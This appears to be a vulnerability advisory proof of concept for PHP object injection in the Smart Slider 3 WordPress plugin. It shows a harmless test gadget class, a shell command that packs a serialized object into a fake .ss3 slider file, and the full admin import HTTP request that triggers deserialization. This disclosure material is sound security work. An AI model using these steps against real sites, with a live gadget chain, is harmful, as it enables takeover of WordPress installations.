Smart Slider 3 < 3.5.1.11 - PHP Object Injection

To simulate a gadget chain, put the following code in a plugin

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Create a fake slider:

echo 'O:4:"Evil":0:{};' > data && zip EvilSlider.ss3 data

And import the fake slider in the Smart Slider 3 dashboard.


POST /wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=sliders&nextendaction=import&groupID=0&nextend_nonce=e771567d65 HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------304866225113075420131015772767
Content-Length: 1416
Cookie:[admin+]

-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="nextend_nonce"

e771567d65
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[upload_or_local]"

0
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[import-file]"; filename="My project(2).ss3"
Content-Type: application/octet-stream

[File data]
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="selectslider[local-import-file]"


-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[local-import-file]"


-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[delete]"

0
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[restore]"

0
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="selectslider[image-mode]"

clone
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[image-mode]"

clone
-----------------------------304866225113075420131015772767--